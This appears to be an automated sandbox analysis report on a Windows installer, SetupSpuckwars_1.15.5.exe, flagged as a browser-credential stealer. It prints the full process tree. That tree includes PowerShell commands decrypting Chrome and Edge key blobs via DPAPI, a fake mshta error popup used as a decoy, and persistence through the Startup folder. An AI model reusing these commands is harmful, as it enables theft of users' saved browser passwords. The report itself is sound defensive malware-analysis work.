Windows
Analysis Report
SetupSpuckwars_1.15.5.exe
Overview
General Information
Detection
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SetupSpuckwars_1.15.5.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\SetupSpuckwars_1.15.5.exe" MD5: 320696B6328D7D82817DA50697FCB673)
- spuckwars.exe (PID: 5856 cmdline: C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- cmd.exe (PID: 2232 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 3084 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- spuckwars.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1692,i,9078033597839116286,17883878093314677188,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- spuckwars.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --mojo-platform-channel-handle=2024 --field-trial-handle=1692,i,9078033597839116286,17883878093314677188,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- cmd.exe (PID: 3288 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7084 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 6532 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6192 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7204 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7252 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7440 cmdline: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- mshta.exe (PID: 7456 cmdline: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- spuckwars.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spuckwars.exe" MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- cleanup
No configs have been found
No yara matches
System Summary
- Source: Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
- Source: Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)